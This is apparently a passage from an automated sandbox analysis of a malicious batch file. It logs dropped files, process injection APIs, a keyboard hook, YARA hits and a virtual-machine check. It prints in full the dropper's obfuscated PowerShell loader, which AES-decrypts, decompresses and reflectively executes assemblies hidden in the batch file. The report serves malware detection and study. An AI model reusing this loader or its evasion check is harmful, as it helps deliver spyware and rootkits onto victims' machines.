Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000001C.00000002.3557370304.00000240B2DD6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: svchost.exe, 00000025.00000002.3601953050.000001E709ED9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000000.2298743964.000001E709ED9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.msftconnecttest.com
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp, Null.6.dr	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	Jump to dropped file
Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	Jump to dropped file
Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found large BAT file

Source: NhoqAfkhHL.bat

Static file information: 7301955

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\$nya-onimai2\qVrKPA.exe

Jump to dropped file

Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	7_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E858982C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	8_2_000001E858982C80
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE8627E8 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	9_2_00000140AE8627E8
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE862300 NtQuerySystemInformation,StrCmpNIW,	9_2_00000140AE862300
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB32C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	15_2_000001160CB32C80
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD02518 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	20_2_000001428DD02518

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\$nya-gykiBRcP	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$nya-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$nya-onimai2\qVrKPA.exe

Source: C:\Windows\System32\svchost.exe

File deleted: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Jump to behavior

Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140001CF0	7_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140002D4C	7_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_00000001400031D0	7_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140001274	7_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140002434	7_2_0000000140002434
Source: C:\Windows\System32\winlogon.exe	Code function: 8_3_000001E85895CE18	8_3_000001E85895CE18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_3_000001E85895CC94	8_3_000001E85895CC94
Source: C:\Windows\System32\winlogon.exe	Code function: 8_3_000001E8589523F0	8_3_000001E8589523F0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E85898DA18	8_2_000001E85898DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E85898D894	8_2_000001E85898D894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E858982FF0	8_2_000001E858982FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589BDA18	8_2_000001E8589BDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589BD894	8_2_000001E8589BD894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589B2FF0	8_2_000001E8589B2FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589EDA18	8_2_000001E8589EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589ED894	8_2_000001E8589ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589E2FF0	8_2_000001E8589E2FF0
Source: C:\Windows\System32\lsass.exe	Code function: 9_3_00000140ADFCCE18	9_3_00000140ADFCCE18
Source: C:\Windows\System32\lsass.exe	Code function: 9_3_00000140ADFCCC94	9_3_00000140ADFCCC94
Source: C:\Windows\System32\lsass.exe	Code function: 9_3_00000140ADFC23F0	9_3_00000140ADFC23F0
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE862FF0	9_2_00000140AE862FF0
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE86D894	9_2_00000140AE86D894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_00000140AE86DA18	9_2_00000140AE86DA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_3_00000195DD59CC94	12_3_00000195DD59CC94
Source: C:\Windows\System32\svchost.exe	Code function: 12_3_00000195DD5923F0	12_3_00000195DD5923F0
Source: C:\Windows\System32\svchost.exe	Code function: 12_3_00000195DD59CE18	12_3_00000195DD59CE18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5CD894	12_2_00000195DD5CD894
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5C2FF0	12_2_00000195DD5C2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DD5CDA18	12_2_00000195DD5CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1ADA18	12_2_00000195DE1ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1A2FF0	12_2_00000195DE1A2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000195DE1AD894	12_2_00000195DE1AD894
Source: C:\Windows\System32\cmd.exe	Code function: 13_3_00000192913BCC94	13_3_00000192913BCC94
Source: C:\Windows\System32\cmd.exe	Code function: 13_3_00000192913B23F0	13_3_00000192913B23F0
Source: C:\Windows\System32\cmd.exe	Code function: 13_3_00000192913BCE18	13_3_00000192913BCE18
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913ED894	13_2_00000192913ED894
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913E2FF0	13_2_00000192913E2FF0
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_00000192913EDA18	13_2_00000192913EDA18
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_000001929162D894	13_2_000001929162D894
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_0000019291622FF0	13_2_0000019291622FF0
Source: C:\Windows\System32\cmd.exe	Code function: 13_2_000001929162DA18	13_2_000001929162DA18
Source: C:\Windows\System32\conhost.exe	Code function: 14_3_00000139F96A23F0	14_3_00000139F96A23F0
Source: C:\Windows\System32\conhost.exe	Code function: 14_3_00000139F96ACE18	14_3_00000139F96ACE18
Source: C:\Windows\System32\conhost.exe	Code function: 14_3_00000139F96ACC94	14_3_00000139F96ACC94
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96D2FF0	14_2_00000139F96D2FF0
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96DDA18	14_2_00000139F96DDA18
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00000139F96DD894	14_2_00000139F96DD894
Source: C:\Windows\System32\dwm.exe	Code function: 15_3_000001160CD323F0	15_3_000001160CD323F0
Source: C:\Windows\System32\dwm.exe	Code function: 15_3_000001160CD3CC94	15_3_000001160CD3CC94
Source: C:\Windows\System32\dwm.exe	Code function: 15_3_000001160CD3CE18	15_3_000001160CD3CE18
Source: C:\Windows\System32\dwm.exe	Code function: 15_3_000001160CB623F0	15_3_000001160CB623F0
Source: C:\Windows\System32\dwm.exe	Code function: 15_3_000001160CB6CC94	15_3_000001160CB6CC94
Source: C:\Windows\System32\dwm.exe	Code function: 15_3_000001160CB6CE18	15_3_000001160CB6CE18
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB32FF0	15_2_000001160CB32FF0
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB3D894	15_2_000001160CB3D894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB3DA18	15_2_000001160CB3DA18
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB92FF0	15_2_000001160CB92FF0
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB9D894	15_2_000001160CB9D894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CB9DA18	15_2_000001160CB9DA18
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBC2FF0	15_2_000001160CBC2FF0
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBCD894	15_2_000001160CBCD894
Source: C:\Windows\System32\dwm.exe	Code function: 15_2_000001160CBCDA18	15_2_000001160CBCDA18
Source: C:\Windows\System32\svchost.exe	Code function: 19_3_00000257E107CC94	19_3_00000257E107CC94
Source: C:\Windows\System32\svchost.exe	Code function: 19_3_00000257E10723F0	19_3_00000257E10723F0
Source: C:\Windows\System32\svchost.exe	Code function: 19_3_00000257E107CE18	19_3_00000257E107CE18
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10AD894	19_2_00000257E10AD894
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10A2FF0	19_2_00000257E10A2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10ADA18	19_2_00000257E10ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10DD894	19_2_00000257E10DD894
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10D2FF0	19_2_00000257E10D2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_00000257E10DDA18	19_2_00000257E10DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_3_000001428DCDCE18	20_3_000001428DCDCE18
Source: C:\Windows\System32\svchost.exe	Code function: 20_3_000001428DCDCC94	20_3_000001428DCDCC94
Source: C:\Windows\System32\svchost.exe	Code function: 20_3_000001428DCD23F0	20_3_000001428DCD23F0
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD0DA18	20_2_000001428DD0DA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD0D894	20_2_000001428DD0D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD02FF0	20_2_000001428DD02FF0
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD3DA18	20_2_000001428DD3DA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD3D894	20_2_000001428DD3D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000001428DD32FF0	20_2_000001428DD32FF0
Source: C:\Windows\System32\svchost.exe	Code function: 21_3_000001F28C1D23F0	21_3_000001F28C1D23F0
Source: C:\Windows\System32\svchost.exe	Code function: 21_3_000001F28C1DCC94	21_3_000001F28C1DCC94
Source: C:\Windows\System32\svchost.exe	Code function: 21_3_000001F28C1DCE18	21_3_000001F28C1DCE18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C93D894	21_2_000001F28C93D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C932FF0	21_2_000001F28C932FF0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C93DA18	21_2_000001F28C93DA18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C96D894	21_2_000001F28C96D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C962FF0	21_2_000001F28C962FF0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001F28C96DA18	21_2_000001F28C96DA18
Source: C:\Windows\System32\svchost.exe	Code function: 22_3_000001CA97FD23F0	22_3_000001CA97FD23F0
Source: C:\Windows\System32\svchost.exe	Code function: 22_3_000001CA97FDCE18	22_3_000001CA97FDCE18
Source: C:\Windows\System32\svchost.exe	Code function: 22_3_000001CA97FDCC94	22_3_000001CA97FDCC94
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA9854D894	22_2_000001CA9854D894
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA9854DA18	22_2_000001CA9854DA18
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000001CA98542FF0	22_2_000001CA98542FF0
Source: C:\Windows\System32\svchost.exe	Code function: 23_3_000001D2652ECC94	23_3_000001D2652ECC94
Source: C:\Windows\System32\svchost.exe	Code function: 23_3_000001D2652E23F0	23_3_000001D2652E23F0
Source: C:\Windows\System32\svchost.exe	Code function: 23_3_000001D2652ECE18	23_3_000001D2652ECE18
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26531D894	23_2_000001D26531D894
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D265312FF0	23_2_000001D265312FF0
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26531DA18	23_2_000001D26531DA18
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26534D894	23_2_000001D26534D894
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D265342FF0	23_2_000001D265342FF0
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001D26534DA18	23_2_000001D26534DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_3_00000254A27CCE18	24_3_00000254A27CCE18
Source: C:\Windows\System32\svchost.exe	Code function: 24_3_00000254A27C23F0	24_3_00000254A27C23F0
Source: C:\Windows\System32\svchost.exe	Code function: 24_3_00000254A27CCC94	24_3_00000254A27CCC94
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D4DA18	24_2_00000254A2D4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D4D894	24_2_00000254A2D4D894
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000254A2D42FF0	24_2_00000254A2D42FF0
Source: C:\Windows\System32\svchost.exe	Code function: 25_3_0000024B87DACC94	25_3_0000024B87DACC94
Source: C:\Windows\System32\svchost.exe	Code function: 25_3_0000024B87DA23F0	25_3_0000024B87DA23F0
Source: C:\Windows\System32\svchost.exe	Code function: 25_3_0000024B87DACE18	25_3_0000024B87DACE18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DDD894	25_2_0000024B87DDD894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DD2FF0	25_2_0000024B87DD2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B87DDDA18	25_2_0000024B87DDDA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B8848DA18	25_2_0000024B8848DA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B88482FF0	25_2_0000024B88482FF0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000024B8848D894	25_2_0000024B8848D894
Source: C:\Windows\System32\svchost.exe	Code function: 26_3_00000205FB3CCC94	26_3_00000205FB3CCC94
Source: C:\Windows\System32\svchost.exe	Code function: 26_3_00000205FB3C23F0	26_3_00000205FB3C23F0
Source: C:\Windows\System32\svchost.exe	Code function: 26_3_00000205FB3CCE18	26_3_00000205FB3CCE18
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD40DA18	26_2_00000205FD40DA18
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD40D894	26_2_00000205FD40D894
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_00000205FD402FF0	26_2_00000205FD402FF0
Source: C:\Windows\System32\svchost.exe	Code function: 29_3_000001A20567CE18	29_3_000001A20567CE18
Source: C:\Windows\System32\svchost.exe	Code function: 29_3_000001A20567CC94	29_3_000001A20567CC94
Source: C:\Windows\System32\svchost.exe	Code function: 29_3_000001A2056723F0	29_3_000001A2056723F0
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056ADA18	29_2_000001A2056ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056AD894	29_2_000001A2056AD894
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001A2056A2FF0	29_2_000001A2056A2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 30_3_0000018EC1F3CC94	30_3_0000018EC1F3CC94
Source: C:\Windows\System32\svchost.exe	Code function: 30_3_0000018EC1F323F0	30_3_0000018EC1F323F0
Source: C:\Windows\System32\svchost.exe	Code function: 30_3_0000018EC1F3CE18	30_3_0000018EC1F3CE18
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F6D894	30_2_0000018EC1F6D894
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F62FF0	30_2_0000018EC1F62FF0
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000018EC1F6DA18	30_2_0000018EC1F6DA18
Source: C:\Windows\System32\svchost.exe	Code function: 31_3_0000025CE3BCCE18	31_3_0000025CE3BCCE18
Source: C:\Windows\System32\svchost.exe	Code function: 31_3_0000025CE3BCCC94	31_3_0000025CE3BCCC94
Source: C:\Windows\System32\svchost.exe	Code function: 31_3_0000025CE3BC23F0	31_3_0000025CE3BC23F0
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E0DA18	31_2_0000025CE3E0DA18
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E0D894	31_2_0000025CE3E0D894
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE3E02FF0	31_2_0000025CE3E02FF0
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE4172FF0	31_2_0000025CE4172FF0
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE417D894	31_2_0000025CE417D894
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000025CE417DA18	31_2_0000025CE417DA18

Source: qVrKPA.exe.28.dr

Static PE information: No import functions for PE file found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2175
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2173
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2175	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2173	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winBAT@32/25@1/1

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,

7_2_0000000140002D4C

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

7_2_000000014000217C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\9ca1f38e-ee61-4c4c-beaf-9fc7674951a2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ro1ymda.0dm.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" "

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
